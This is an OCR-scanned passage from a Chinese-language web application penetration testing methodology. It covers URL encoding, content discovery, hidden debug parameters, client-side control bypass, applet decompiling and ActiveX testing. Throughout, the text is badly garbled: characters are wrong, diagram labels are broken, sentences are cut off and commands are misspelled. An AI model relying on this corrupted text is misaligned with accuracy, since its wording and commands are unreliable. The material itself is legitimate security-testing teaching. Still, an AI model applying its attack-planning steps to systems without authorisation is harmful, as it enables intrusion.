后 文中 该 方法 论 使 用 的 分 级 数字 目录 相互 对 应 ， 方 便 读者 找到 相关 内 
X o 


识别 与 分 析 2 
21.1 解析 应 用 程序 内 容 


21.2 分 析 应 用 程序 


一 


: 应 用 程序 逻辑 ; ; ”访问 处 理 ii ”输入 处 理 |i 应 用 程序 主机 | 
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21.12 其 他 21.13 信息 
检查 泄漏 


图 21-1 本 章 讨论 的 方法 论 中 包含 的 主要 区 域 


这 个 方法 论 中 的 一 系列 任务 根据 它们 之 间 的 逻辑 依赖 关系 组 织 和 
排序 。 我 们 将 尽 可 能 在 任务 描述 中 重点 介绍 这 些 依赖 和 关系。 但是， 实 
际 上 ， 渗 透 测试 员 往 往 需要 发 挥 目 己 的 想象 ， 思 考 应 采取 的 攻击 方 
回 ， 并 根据 所 发 现 的 有 天 目标 应 用 程序 的 信息 指 寻 攻击 方向 ， 如 下 所 
ZR œ 

口 在 某 一 个 阶段 收集 到 的 信息 有 助 于 返回 到 前 一 个 阶段 ， 以 设计 
更 有 针对 性 的 攻击 。 例 如 ， 渗 透 测 试 员 可 以 利用 访问 控制 漏洞 获得 所 
有 用 户 的 列表 ， 针 对 验证 功能 实施 更 有 效 的 密码 猜测 攻击 。 

口 在 应 用 程序 的 某 个 区 域 发 现 的 一 个 关键 漏洞 可 催化 对 另 一 个 区 
域 的 攻击 。 例 如 ， 渗 透 测 试 员 可 以 利用 文件 泄露 漏洞 对 应 用 程序 的 关 
键 功 能 进行 代码 审查 ， 而 不 是 盲目 地 探查 这 些 功能 。 


口 一 些 区 域 的 测试 结 末 有 助 于 确定 在 其 他 区 域 可 立即 探查 出 的 重 
复出 现 的 漏洞 模式 。 例 如 ， 渗 透 测 试 员 可 以 利用 应 用 程序 输入 确认 过 
e as ee henna ie atone 

| 的 方法 。 

可 以 使 用 这 个 方法 论 中 列 出 的 步 又 作为 攻击 指导 ， 并 把 它 作为 避 
免 续 忽 的 清单 ， 但 不 一 定 要 过 于 疡 格 地 遵守 这 些 步 又 。 请 记 住 以 下 要 
点 : 在 很 大 程度 上 ， 我 们 描述 的 任务 都 属于 标准 的 常规 性 任务 ;要 对 


一 般 规 范 
当 执 行 攻击 Web 应 用 程序 所 需 的 详细 步骤 时 ， 应 该 始终 记 住 以 下 
pee 。 这 些 注意 事项 适用 于 所 有 必须 测试 的 区 域 以 及 需要 采用 的 
种 技巧 。 
aW, 一些 字符 在 HTTP 请 求 的 不 同 部 分 具有 特殊 的 含义 。 当 修 
改 请 求 中 的 数据 时 ， 应 该 对 这 些 字符 进行 UREL 编 码 ， 以 确保 应 用 程序 
按照 想 要 的 方式 解释 这 些 字 符 。 
e &x 用 于 分 隔 URL 碍 询 字 符 串 与 消息 主体 中 的 参数 。 要 插入 
一 个 字面 量 & 字 符 ， 必 须 将 其 编码 为 9%26 。 
a = 用 于 分 隅 URL 查 询 字 人 符 串 与 消息 主体 中 每 个 参数 的 名 称 
与 值 。 要 插入 一 个 字面 量 = 字 符 ， 必 须 将 其 编码 为 %3d © 
四 ?用 于 标记 URL 查 询 字 符 串 的 起 始 位 置 。 要 插入 一 个 字面 
量 ? 字 符 ， 必 须 将 其 编码 为 %3f 。 
a 宝 格 用 于 在 请 求 的 第 一 行 标 记 UREL 的 结束 位 置 ， 并 可 用 于 
在 Cookie 消 息 头 中 表示 一 个 cookie 值 结束 。 要 插入 一 个 
字面 量 空格 字符 ， 必 须 将 其 编码 为 %20 或 +。 
a 因为 + 表示 一 个 编码 的 空格 ， 要 插入 一 个 字面 量 + 字 从， 必 
须 将 其 编码 为 %2b。 
e ;用 于 在 Cookie 消 息 头 中 分 隔 单个 的 cookie。 要 揪 入 一 个 字 
面 量 ; 字符 ， 必 须 将 其 编码 为 %3b 。 
me # 用 于 在 URL 中 标记 片段 标识 符 。 如 果 在 浏览 器 的 URL 中 
输入 这 个 字符 ， 它 会 将 传送 给 服务 器 的 URL 截 短 。 要 插 
入 一 个 字面 量 # 字 人 符 ， 必 须 将 其 编码 为 %23。 
m % 在 URL 编 码 方案 中 作为 前 级 。 要 插入 一 个 字面 量 % 字 
符 ， 必 须 将 其 编码 为 %25。 
eR, BFP STS SETS OO eT 
ASCII 字 符 代 码 进 行 URL 编 码 。 空 字 太 与 换行 从 的 编码 


分 别 为 %00 和 %0a。 
口 此外， 需要 注意 ， 在 表单 中 输入 URL 编 码 的 数据 通常 会 导致 浏 
哆 絮 执行 男 一 层 编码 。 例 如 ， 在 表单 中 提交 %00 可 能 会 导致 问 服务 屁 
e 。 为 此 ， 通 常 最 好 是 在 拦截 代理 服务 万 中 查看 最 终 请 


口 许多 查找 常见 Web 应 用 程序 的 测试 需要 发 送 各 种 专门 设计 的 输 
入 字符 串 ， 并 监控 应 用 程序 的 啊 应 ， 从 中 搜索 表示 漏洞 存在 的 反 第 现 
象 。 有 时候， 无 论 是 否 提 交 某 个 特定 漏洞 的 触发 器 ， 应 用 程序 对 一 个 
特殊 请 求 的 啊 应 都 将 包含 这 个 漏洞 的 签名 。 只 要 提交 专门 设计 的 特殊 
输入 导致 了 与 某 个 漏洞 有 关 的 行为 “如 一 个 特殊 的 错误 消息 ) ， 就 应 
该 重新 核查 ， 确 定 在 相关 参数 中 提交 民 性 输入 是 否 也 会 造成 相同 的 行 
A 。 如 果 两 种 输入 的 行为 相同 ， 那 么 最 初 的 发 现 可 能 是 一 个 错误 警 

口 通常 ， 应 用 程序 会 从 前 一 个 请 求 中 收集 一 定量 的 状态 ， 这 会 影 
啊 它 们 如 何 啊 应 随后 的 请 求 。 有 时 ， 当 调查 一 个 尚未 确定 的 漏洞 并 隔 
离 某 一 个 反常 行为 的 根源 时 ， 必 须 避 人 免 任何 收集 到 的 状态 信息 造成 的 
影响 。 通 常 ， 使 用 一 个 新 的 浏 唤 右 进 程 开始 另 一 个 会 话 ， 再 使 用 民 性 
请 求 导 航 至 观测 到 发 生 反 第 的 位 置 ， 然 后 重新 提交 专门 设计 的 输入 ， 
束 足 以 达到 这 个 目的 。 还 可 以 对 请 求 中 包含 的 cookie 和 缓存 信息 进行 
调整 ， 重 复 利 用 这 种 方法 。 此 外 ， 还 可 以 使 用 Burp Repeater 等 工具 陋 
0 


口 一 些 应 用 程序 使 用 一 种 负载 平衡 的 配置 ， 其 中 连续 的 HTTP 请 求 
可 能 会 被 不 同 的 后 端 服务 大 在 Web 层 、 展 现 层 、 数 据 层 或 其 他 层 处 
理 。 不 同 服务 絮 在 配置 上 的 细微 差异 可 能 会 影响 到 处 理 结果 。 男 外 ， 
一 些 成 功 的 攻击 将 改变 处 理 请 求 的 某 一 台 服 务 右 的 状态 ， 例 如 在 Web 
根 目 录 上 创建 一 个 新 的 文件 。 为 隔离 特殊 操作 造成 的 影响 ， 可 能 需要 
连续 提交 儿 个 相同 的 请 求 ， 测 试 每 个 请 求 的 结 采 ， 直 到 请 求 被 相关 服 
Fa LEE o 

假设 需要 在 咨询 工作 中 采用 这 种 方法 ， 渗 透 测 试 员 应 当 首 移 确 定 
测试 范围 ， 明 确 了 解 测试 包含 的 主机 名 、URL 与 功能 以 及 允许 执行 的 
测试 类 型 是 否 存在 任何 限制 。 还 应 当 向 应 用 程序 所 有 者 告知 对 一 个 “ 黑 
盒 " 目 标 实施 任何 渗透 测试 包含 的 内 在 风险 ， 并 建议 他 们 在 开始 测试 前 
备份 所 有 重要 的 数据 。 


21.1 Ww FA Fe 容 
21.1.1 可 见 的 内 容 


(1) 配置 浏览 器 ， 使 用 首选 集成 代理 / 抓 取 工 具 。 可 以 使 用 Burp 
与 WebScarab 监 控 和 解析 由 代理 服务 器 处 理 的 Web 内 容 ， 对 站 点 实行 被 
动 抓 取 。 

(2) 如 果 有 用 ， 配 置 浏览 器 ， 使 用 一 个 扩展 (如 IEWatch) 监控 
和 分 析 被 浏览 器 处 理 的 HTTP 与 HTML 内 容 。 


链接 的 内 容 


| 21.1.1 搜 索 可 见 © | 
，| 的 内 容 ! 


图 21-2 解析 应 用 程序 内 容 


(3) 以 常规 方式 浏览 整个 应 用 程序 ， 访 问 发 现 的 每 一 个 链接 和 
URL， 提 交 每 一 个 表单 并 执行 全 部 多 阶段 功能 。 壬 试 在 JavaScript 激 活 
与 禁用 、cookie 激 活 与 禁用 的 情况 下 浏览 。 许 多 应 用 程序 能 够 处 理 各 
种 浏览 万 配置 ， 渗 透 测 试 员 可 以 获得 应 用 程序 内 的 不 同 内 容 和 代码 路 


径 。 

(4) 如 果 应 用 程序 使 用 身份 验证 ， 并 且 渗 透 测试 员 已 经 拥有 或 可 
以 建立 一 个 登录 帐户， 那么 他 就 可 以 使 用 该 账户 访问 被 保护 的 功能 。 

(5) 当 浏 览 、 监 控 通 过 拦截 代理 服务 器 的 请 求 与 响应 时 ， 了 解 被 
种 交 的 数据 种 类 ， 了 解 客户 端 如 何 控制 服务 器 端 应 用 程序 的 行为 。 

(6) 检查 被 动 抓 取 生成 的 站 点 地 图 ， 确 定 任何 尚未 使 用 浏览 器 访 
问 到 的 内 容 或 功能 。 根 据 抓 取 结果 ， 确 定 发 现 每 一 项 内 容 的 位 置 (fil 
如 ， 在 Burp Spider 中 ， 检 查 “ 链 接 自 * 的 详细 内 容 ) 。 使 用 浏览 器 访问 


以 上 内 容 ， 以 便 怜 虫 解析 服务 器 的 响应 ， 确 定 其 他 任何 内 容 。 重 复 执 
行 上 述 步 又 ， 直 到 无 法 再 确定 其 他 内 容 或 功能 。 

(7) 完成 手动 浏览 和 被 动 抓 取 后 ， 可 以 用 一 组 发 现 的 URL 作 为 种 
子 ， 使 用 息 虫 抓 取 应 用 程序 。 有 时， 这 样 可 发 现 其 他 在 手动 浏 咒 时 忽 
略 的 内 容 。 在 进行 目 动 抓 取 前 ， 首 移 应 确定 任何 危险 的 或 可 能 会 中 断 
应 用 程序 会 话 的 URL， 并 配置 怜 虫 ， 将 它们 排除 在 抓 取 范围 之 外 。 


21.1.2 浏览 公共 资源 


(1) 使 用 因特网 搜索 引擎 和 历史 档案 (例如 ，Wayback 
Machine) 确定 它们 编 入 索引 或 保存 的 与 目标 应 用 程序 有 关 的 内 容 。 

(2) 使 用 高 级 搜索 选项 提高 搜索 的 效率 。 例 如 ， 在 Google 中 ， 可 
以 使 用 site: 获 取 所 有 与 目标 站 点 有 关 的 内 容 ; 使 用 link: 获 取 链 接 到 目标 
站 点 的 其 他 站 上 点。 如果 在 搜索 过 程 中 找到 现 有 应 用 程序 已 经 删除 的 内 
容 ， 仍 然 可 以 从 搜索 引擎 的 缓存 中 得 看 这 些 内 容 。 这 些 已 被 删除 的 内 
容 中 可 能 包含 尚未 删除 的 其 他 资源 的 链接 。 

(3) 搜索 在 应 用 程序 内 容 [如 联系 信息 ， 包 括 并 未 在 屏幕 上 显示 
的 内 容 (如 HTML 注 释 ) | 中 发 现 的 任何 姓名 与 电子 邮件 地 址 。 除 
Web 搜 索 外 ， 还 应 进行 新 闻 和 分 组 搜索 。 在 因特网 论坛 上 寻找 与 目标 
应 用 程序 及 其 支持 基础 染 构 有 关 的 所 有 技术 信息 。 

(4) 检查 已 发 布 的 任何 WSDL 文 件 ， 以 生成 应 用 程序 可 能 采用 的 
功能 名 称 和 参数 值 列表 。 


21.1.3 ”发 现 隐藏 的 内 容 


(1) 确定 应 用 程序 如 何 处 理 访问 不 存在 的 资源 的 请 求 。 手 动 提 出 
一 些 请 求 ， 访 问 已 知 有 效 和 无 效 的 资源 ， 比 较 应 用 程序 对 这 些 请 求 的 
啊 应 ， 找 到 一 种 确定 资源 并 不 存在 的 简单 方法 。 

(2) 获取 常见 文件 与 目录 名 以 及 常见 的 文件 扩展 名 列表 。 将 这 些 
列表 添加 到 已 经 确定 的 应 用 程序 内 容 以 及 通过 这 些 内 容 推 师 出 的 其 他 
内 容 中 。 设 法 了 解 应 用 程序 开发 者 采用 的 命名 方案 。 例 如 ， 如 采 有 页 
面 被 命名 为 AddDocument.jjsp 和 ViewDocument.jsp， 束 可 能 有 名 为 
EditDocument.jsp 和 RemoveDocument.jsp 的 页 面 存在 。 

(3) 审查 所 有 客户 端 代 码 ， 确 定 任 何 与 服务 器 端 内 容 (包括 
HTML 注 释 和 禁用 的 表单 元 素 ) 有 关 的 线索 。 


(4) 使 用 第 14 章 描述 的 自动 化 技巧 ， 根 据 目 录 名 、 文 件 名 及 文件 
扩展 名 列表 提出 大 量 请 求 。 监 控 应 用 程序 的 啊 应 ， 确 定 存 在 的 可 访问 
的 内 容 。 

(5) 以 刚刚 枚 举 出 的 内 容 和 模式 作为 用 户 指导 的 抓 取 以 及 自动 化 
深入 搜索 的 基础 ， 重 复 进 行 这 些 内 容 碍 找 操 作 。 


21.1.4 查找 默认 的 内 容 


(1) 针对 Web 服 务 器 运行 Nikto， 探 查 所 有 默认 或 已 知 存在 的 内 
容 。 使 用 Nikto 的 选项 提高 探查 的 效率 。 例 如 ， 使 用 -root 选 项 指定 查找 
默认 内 容 的 目录 ， 或 者 使 用 -404 远 项 指定 一 个 标识 定制 化 “文件 未 发 
现 "页 面 的 字符 吝 。 
(2) 手动 核查 所 有 可 能 有 用 的 发 现 ， 减 少 探查 结果 中 的 错误 警 


(3) 请 求 服务 器 的 根 目 未 ， 在 Host 消 息 头 中 指定 耻 地 址 ， 确 定 应 
用 程序 是 否 使 用 任何 不 同 的 内 容 做 出 啊 应 。 如 果 和 是， 则 针对 该 耳 地址 
及 服务 器 名 称 运 行 Nikto 扫 摘 。 

(4) 向 服务 器 的 根 目录 提出 请 求 ， 指 定 一 系列 User-Agent 消 息 


头 ， 如 www.useragentstring.com/pages/useragentstring.php 所 示 。 
21.1.5“ 枚 举 标识 符 指 定 的 功能 


(1) 确定 任何 通过 在 请 求 参 数 中 提交 一 个 功能 标识 符 〈 例 
如 ，/admin.jsp?action=editUser 或 /main.php?func=A21) 访问 特殊 应 用 
程序 功能 的 情况 。 

(2) 对 用 于 访问 单项 功能 的 机 制 ， 应 用 21.1.3 节 中 使 用 的 内 容 查 
找 技巧 。 例 如 ， 如 果 应 用 程序 使 用 一 个 包含 功能 名 称 的 参数 ， 首 移 应 
该 确定 指定 无 效 功能 时 应 用 程序 的 行为 ， 设 法 找到 一 个 确定 被 请 求 的 
功能 确实 有 效 的 简单 方法 。 列 出 常用 的 功能 名 称 或 遍历 所 使 用 的 标识 
oe o 使 枚 举 有 效 功 能 的 操作 目 动 化 ， 使 其 尽 可 能 迅速 高 效 
地 完成 。 

(3) 如 果 适 用 ， 根 据 功 能 路 径 而 非 URL 编 制 一 幅 应 用 程序 内 容 地 
图 ， 列 出 所 有 枚 举 出 的 功能 和 逻辑 路 径 以 及 它们 之 则 的 依赖 天 系 。 

(相关 实例 请 参阅 第 4 章 。) 


21.1.6 ”调试 参数 


(1) 选择 一 个 或 几 个 使 用 隐藏 调试 参数 (如 debug=true) 的 应 用 
程序 页 面 或 功能 。 它 们 最 有 可 能 出 现在 登录 、 搜 索 、 文 件 上 传 或 下 载 
等 天 键 功 能 

(2) 使 用 常用 调试 参数 名 (如 debug、test、hide 和 source) 与 常 
用 参数 值 (如 true、yes、on 和 1) 列表 ， 排 出 这 些 名 称 与 值 的 全 部 组 
合 ， 向 每 一 个 目标 功能 提交 每 个 名 / 值 对 。 对 于 POST 请 求 ， 在 URL 碍 
询 字 符 串 和 请 求 主 体 中 提交 参数 。 使 用 第 14 章 描述 的 技巧 目 动 完成 这 
项 操作 。 例 如 ， 可 以 使 用 Burp Intruder 中 的 “集束 炸弹 ”攻击 类 型 将 两 组 
有 效 载 傈 的 全 部 组 合 结合 起 来 。 

(3) 在 应 用 程序 的 啊 应 中 查找 任何 表示 添加 的 参数 对 应 用 程序 的 
行为 造成 影响 的 反常 现象 。 


21.2 用 程 


21.2.1 功能 
21.2.3 确定 所 


pias mee 使 用 的 技术 


21.2.4 解析 受 攻击 面 


图 21-3 ”分 析 应 用 程序 


(1) 确定 为 使 应 用 程序 正常 运行 而 建立 的 核心 功能 以 及 每 项 功能 
旨 在 执行 的 操作 ° 

(2) 确定 应 用 程序 采用 的 核心 安全 机 制 以 及 它们 的 工作 机 制 。 重 
点 了 解 处 理 喘 份 验证 、 会 话 管理 与 访问 控制 的 关键 机 制 以 及 支持 它们 
的 功能 ， 如 用 户 注 册 和 账户 恢复 。 

(3) 确定 所 有 较为 外 围 的 功能 和 行为 ， 如 重 定 向 使 用 、 站 外 链 
接 、 错 误 消 息 、 管 理 与 日 志 功 能 。 

(4) 确定 任何 与 应 用 程序 在 其 他 地 方 使 用 的 标准 GUI 外 观 、 参 数 
命名 或 导航 机 制 不 一 致 的 功能 ， 然 后 将 其 挑选 出 来 以 进行 深入 测试 。 


21.2.2 ”确定 数据 进入 点 


(1) 确定 在 应 用 程序 中 引入 用 户 输 入 的 所 有 进入 点 ， 包 括 URL、 
查询 字符 串 参 数 、POST 数 据 、cookie 与 其 他 由 应 用 程序 处 理 的 HTTP 
消息 头 。 

(2) 分 析 应 用 程序 使 用 的 所 有 定制 数据 传输 或 编码 机 制 ， 如 非常 
规 的 查询 字符 串 格 式 。 了 解 被 提交 的 数据 是 否 包含 参数 名 与 参数 值 ， 
或 者 是 否 使 用 了 其 他 表示 方法 。 


(3) 确定 所 有 在 应 用 程序 中 引入 用 户 可 控制 或 其 他 第 三 方 数据 的 
带 外 通道 ， 例 如 ， 人 处 理 和 显示 通过 SMTP 收 到 的 消息 的 Web 邮 件 应 用 程 
序 。 


21.2.3 ”确定 所 使 用 的 技术 


(1) 确定 客户 端 使 用 的 各 种 不 同 技术 ， 如 表单 、 脚 本 、cookie、 
Java applet、ActiveX 探 件 与 Flash 对 象 。 

(2) 尽 可 能 确定 服务 器 端 使 用 的 技术 ， 包 括 脚本 语言 、 应 用 程序 
平台 以 及 与 数据 库 和 电子 邮件 系统 等 后 端 组 件 的 交互 。 

(3) 检查 在 应 用 程序 响应 中 返回 的 HTTP Serve AA, ERE 
制 HITP 消 轧 头 或 HIML 源 代码 注释 中 出 现 的 其 他 任何 软件 标识 符 。 注 
意 ， 有 时 候 ， 不 同 的 应 用 程序 区 域 由 不 同 的 后 端 组 件 处理 ， 因 此 渗透 
测试 员 可 能 会 收 到 不 同 的 标识 符 。 

(4) 运行 Httprint 工 具 ， 为 Web 服 务 器 做 “指纹 标识 ”。 

(5) 检查 内 容 解析 过 程 中 获得 的 结果 ， 确 定 所 有 有 助 于 了 解 服务 
妖 端 所 使 用 技术 的 文件 扩展 名 、 目 录 或 其 他 URL 序 列 。 检 查 所 有 会 话 
So 。 同 时， 使 用 Google 搜 索 与 这 些 内 容 有 关 的 


(6) 分 确定 任何 看 似 有 用 的 、 属 于 第 三 方 代 码 组 件 的 脚本 名 称 与 
查询 字符 串 参 数 。 在 Google 中 使 用 inurl: 限 定 词 搜索 这 些 内 容 ， 查 找 所 
有 使 用 相同 脚本 与 参数 、 并 因此 使 用 相同 第 三 方 组 件 的 应 用 程序 。 对 
这 些 站 点 进行 非 入 侵 式 的 审查 ， 这 样 做 可 能 会 发 现 其 他 在 攻击 的 应 用 
程序 中 没有 明确 链接 的 内 容 和 功能 。 


21.2.4 ”解析 受 攻 击 面 


(1) 设法 确定 服务 器 端 应 用 程序 的 内 部 结构 与 功能 以 及 用 于 实现 
客户 端 可 见 行为 的 后 侣 机 制 。 例 如 ， 获 取 客 户 订 单 的 功能 可 能 与 数据 
库 进 行 交 互 。 

(2) 确定 各 种 与 每 一 项 功能 有 关 的 常见 漏洞 。 例 如 ， 文 件 上 传 功 
能 可 能 易于 受到 路 径 遇 历 攻击 ; 用 户 间 通信 可 能 易于 受到 XSS 攻 
击 ; “联络 我 们 ?功能 可 能 易于 受到 SMTP 注 入 攻击 。 请 参阅 第 4 章 了 解 
与 特定 功能 和 技术 有 关 的 第 见 漏洞 实例 。 

(3) 制订 一 个 攻击 计划 ， 优 先 考 虑 最 有 用 的 功能 以 及 与 它 有 关 的 
最 挛 重 的 洪 在 漏洞 。 使 用 这 份 计 划 作 为 指导 ， 决 定 应 对 本 章 讨 论 的 方 


法 的 其 他 区 域 投 入 多 少时 间 和 精力 。 


21.3 k D 


| 传送 数据 | | 入 控件 ;| 4 
: ASP.NET ViewState : 3 | Silverlight*} @ | 


图 21-4 测试 客户 端 控 件 


21.3.1 通过 送 


(1) 在 应 用 程序 中 ， 确 定 隐藏 表单 字段 、cookie 和 URL 参 数 明 显 
用 于 通过 客户 端 传送 数据 的 所 有 情况 。 
(2) 根据 以 上 数据 出 现 的 位 置 及 其 名 称 与 值 ， 党 试 确定 它 在 应 用 
程序 逻辑 中 发 挥 的 作用 。 
(3) 修改 数据 在 应 用 程序 相关 功能 中 的 值 。 确 定 应 用 程序 是 否 处 
理 字段 中 提交 的 任意 值 ， 以 及 是 否 可 以 通过 这 样 做 干扰 应 用 程序 的 逻 
辑 或 破坏 任何 安全 控件 。 
(4) 如 果 应 用 程序 通过 客户 端 传送 模糊 数据 ， 渗 透 测 试 员 可 以 以 
各 种 方式 攻击 这 种 传输 机 制 。 如 果 数 据 被 模糊 处 理 ， 渗 透 测 试 员 可 以 
破译 所 使 用 的 模糊 算法 ， 从 而 在 模糊 数据 中 提交 任意 数据 。 即 使 它 进 
行 了 安全 加 密 ， 仍 然 可 以 在 其 他 情况 下 重新 提交 这 个 数据 ， 干 扰 应 用 
程序 的 逻辑 。 请 参阅 第 5 章 了 解 有 关 这 些 和 其 他 攻击 的 更 多 详情 。 
(5) 如 果 应 用 程序 使 用 ASPNET ViewState， 对 其 进行 测试 ， 确 
定 是 否 可 以 破坏 它 ， 或 者 其 中 是 否 包 含 任何 敏感 信息 。 请 注意 ， 不 同 
应 用 程序 页 面 使 用 ViewState 的 方式 可 能 有 所 不 同 。 
(a) 使 用 Burp Suite 中 的 ViewState 分 析 器 确定 
EnableViewStateMac 选 项 是 否 被 激活 ， 该 选项 表示 ViewState 的 内 
容 不 能 被 修改 。 


(b) 审查 解码 后 的 ViewState， 确 定 它 包含 的 所 有 敏感 数 
据 。 

(c) 修改 一 个 被 解码 的 参数 值 ， 重 新 对 其 编码 ， 然 后 将 它 提 
交 给 ViewState。 如 采 应 用 程序 接受 修改 后 的 参数 值 ， 那 么 应 当 把 
ViewState 当 做 在 应 用 程序 中 引入 任意 数据 的 一 个 输入 渠道 ， 并 对 
它 包 含 的 数据 执行 与 其 他 请 求 参数 相同 的 测试 。 


21.3.2 ”客户 端 输入 控 


(1) 在 将 用 户 输 入 提交 给 服务 器 之 前 ， 确 定 使 用 长 度 限制 和 
JavaScript 检 查 等 客户 端 控 件 对 其 进行 确认 的 任何 情况 。 当 然 ， 这 些 客 
eee 因为 渗透 测试 员 可 以 向 服务 器 发 送 任意 请 
求 。 列 如 : 


<form action="order.asp" onsubmit="return Validate(this})'"> 


<input maxlength="3" name="quantity"> 


(2) 通过 提 区 通常 被 客户 端 控 件 阻 止 的 输入 ， 轮 流 测试 每 一 个 受 
影响 的 字段 ， 确 定 服务 顺 是 否 使 用 相同 的 输入 确认 。 

(3) 能 够 避 开 客户 端 确认 并 不 表示 存在 任何 漏洞 。 因 此 ， 应 该 仔 
细 审 碍 应 用 程序 实施 的 确认 机 制 ， 乔 清 应 用 程序 是 否 依赖 客户 端 控 件 
a BA, 阻止 畸形 输入 ， 以 及 这 些 输入 是 否 可 触发 任何 可 被 利用 的 
条 件 。 

(4) 检查 每 一 个 HTML 表 单 ， 确 定 所 有 茜 用 的 元 素 ， 如 灰色 提交 
按钮 ， 例 如 : 


<input disabled="true" name="product"> 


如 果 发 现任 何 禁 用 的 元 素 ， 就 与 其 他 表单 参数 一 起 提交 这 些 元 
素 ， 确 定 该 元 素 是 否 会 对 应 用 程序 的 处 理 逻 辑 造 成 影响 ， 渗 透 测 试 员 
可 在 攻击 过 程 中 利用 这 些 影响 。 或 者 使 用 目 动 化 代理 服务 器 规则 ， 目 
动 启用 禁用 的 字段 ， 如 Burp Proxy 的 “HTML 修 改 * 规 则 。 


21.3.3 ”测试 浏览 器 扩展 组 件 
1. 了 解 客户 端 应 用 程序 的 操作 


(1) 为 正在 测试 的 客户 端 技术 设置 一 个 本 地 拦截 代理 服务 器 ， 并 
监视 客户 端 与 服务 器 之 间 的 所 有 流量 。 如 果 数 据 被 序列 化 ， 可 以 使 用 
T a 如 Burp 的 内 置 AMF 支 持 工 具 或 用 于 Java 的 DSer 
Burp 搬 件 。 

(2) 浏览 在 客户 端 中 呈现 的 所 有 功能 。 使 用 拦截 代理 服务 器 中 的 
标准 工具 重新 提出 关键 请 求 或 修改 服务 器 响应 ， 以 确定 任何 可 能 的 敏 
感 功能 或 强大 功能 。 

2. 反 编 译 客户 端 

(1) 确定 应 用 程序 使 用 的 任何 applet。 通 过 拦截 代理 服务 器 查找 

以 下 请 求 的 任何 文件 类 型 ; 


applet> 


还 可 以 在 应 用 程序 页 面 的 HTML 源 代码 中 查找 applet 标 签 。 例 如 : 


C:\>jad.exe input.class 
Parsing input.class... Generating input.jad 


(2) 分析 HTML 源 代码 对 applet 方 法 的 全 部 调用 情况 ， 并 确定 
applet 返 回 的 数据 是 否 被 提交 到 服务 器 。 如 果 这 个 数据 为 模糊 数据 ( 即 
经 过 模糊 处 理 或 加 密 ) ， 那 么 要 想 对 其 进行 修改 ， 可 能 需要 反 编译 
applet， 获 得 它 的 源 代码 。 

(3) 在 浏览 器 中 输入 URL， 下 载 applet 字 节 人 码 ， 并 将 文件 保存 在 
本 地 计算 机 中 。 字 节 码 文件 的 名 称 在 applet 标 签 的 code 属 性 中 指定 ， 该 
文件 将 位 于 codebase 属 性 (如 果 此 属性 存在 ) 指定 的 目录 中 ; 否则 ， 
它 将 保存 在 applet 标 签 出 现 的 页 面 所 在 的 目 好 中。 

(4) 使 用 适当 的 工具 将 字 节 码 反 编译 成 源 代码 。 例 如 : 


GC:\>1ad.axs input.class 
Farsing input.cless... Generating input.jad 
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如 果 applet 和 被 压缩 成 JAR、XAP 或 SWF 文件 ， 可 以 使 用 WinRar 或 
WinZip 等 标准 档案 读 取 工 具 将 其 解压 。 


(5) 分 析 相 关 源 代码 (从 执行 返回 模糊 数据 的 方法 的 源 代码 开 
始 ) ， 了 解 应 用 程序 执行 了 何 种 处 理 。 

(6) 确定 applet 中 是 否 包 含 任何 可 用 于 对 任意 输入 进行 相关 模糊 
处 理 的 公共 方法 。 

(7) 如 果 其 中 没有 这 类 方法 ， 修 改 applet 的 源 代码 ， 以 达到 令 其 
执行 的 任何 确认 失效 或 允许 模糊 处 理 任 意 输入 的 目的 。 然 后 可 以 使 用 
供应 商 提 供 的 编译 工具 将 源 代码 重新 编译 成 最 初 的 文件 格式 。 

3. 附加 调试 器 

(1) 对 于 大 型 客户 端 应 用 程序 ， 要 反 编 译 、 修 改 并 重新 打包 整个 
应 用 程序 往往 非常 困难 ， 这 时 会 遇 到 各 种 错误 。 通 常 ， 对 于 这 些 应 用 
程序 ， 在 处 理 时 附加 运行 时 调试 器 会 更 加 容易 。JavaSnoop 可 对 Java 心 
用 程序 执行 上 述 操作 。Silverlight Spy 是 一 款 免费 工具 ， 可 对 Silverlight 
客户 端 进行 运行 时 监视 。 

(2) 找到 应 用 程序 用 于 实现 安全 相关 的 业务 逻辑 的 关键 功能 和 
值 ， 并 在 调用 目标 功能 时 放置 断 点 。 根 据 需 要 修改 参数 或 返回 值 ， 以 
破坏 其 安全 防御 。 

4. 测试 ActiveX 控 件 

(1) 确定 应 用 程序 使 用 的 所 有 ActiveX 探 件 。 寻 找 通 过 拦截 代理 
服务 器 请 求 的 所 有 .cab 文 件 类 型 ， 或 者 在 应 用 程序 页 面 的 HTML 源 代码 
中 寻找 对 象 标签 。 例 如 : 


<OBJECT 


classid="“CLSID: 4F878398-EB58A-11D3-BEE9-00C04FA0D6BA" 


coGebase="https://wahh avoo.com/scripts/input.cab”" 
ic="TheAxControl"> 


</OBJECT> 


(2) 通常 ， 可 以 通过 在 进程 上 附加 调试 器 并 直接 修改 被 处 理 的 数 
据 ， 或 者 改变 程序 的 执行 路 径 ， 破 坏 ActiveX 探 件 实施 的 所 有 输入 确 
认 。 请 参阅 第 5 草 了 解 这 种 攻击 的 更 多 详情 。 

(3) 通常 ， 可 以 根据 ActiveX 控 件 导出 的 各 种 方法 的 名 称 及 提交 
给 它们 的 参数 ， 猜 测 这 些 方 法 的 作用 。 使 用 COMRaider 工 具 可 枚 举 出 
ActiveX 挥 件 导 出 的 各 种 方法 。 测 试 是 否 可 以 操纵 这 些 方法 ， 从 而 影响 
控件 的 行为 并 避 开 它 执行 的 所 有 确认 机 制 。 

(4) 如 果 控 件 的 作用 是 收集 或 核实 某 些 与 客户 端 计算 机 有 关 的 信 
息 ， 就 可 以 使 用 Filemon 与 Regmon 工 具 监 控 控件 收集 到 的 信息 。 通 


常 ， 可 以 在 系统 注册 表 和 文件 系统 中 创建 适当 的 数据 项 ， 修 改 探 件 使 
用 的 输入 ， 从 而 影响 其 行为 。 

(5) 在 任何 ActiveX 控 件 中 探查 可 用 于 攻击 应 用 程序 其 他 用 户 的 
漏洞 。 渗 透 测 试 员 可 以 修改 用 于 调用 控件 的 HTML 代 码 ， 同 它 的 方法 
提交 任意 数据 ， 并 监控 处 理 结 果 ;， 可 以 寻找 看 似 危 险 的 方法 名 称 ， 如 
LaunchExe， 还 可 以 使 用 COMRaider 对 ActiveX 欣 件 进行 基本 的 模糊 测 
试 ， 确 定 缓冲 区 湾 出 之 类 的 漏洞 。 


21.4 试验 证 


21.4.1 了 解 验证 机 制 


和 


: 数据 攻击 ; ; 特殊 功能 li a 3 
: [pamen |): aasan |!) asam |}: [21413 gem]: 
; | 强度 i | 户 恢 复 功 能 ; ;| 户 名 的 唯一 性 ”| ; ; | 试 故障 开放 条 件 f: 
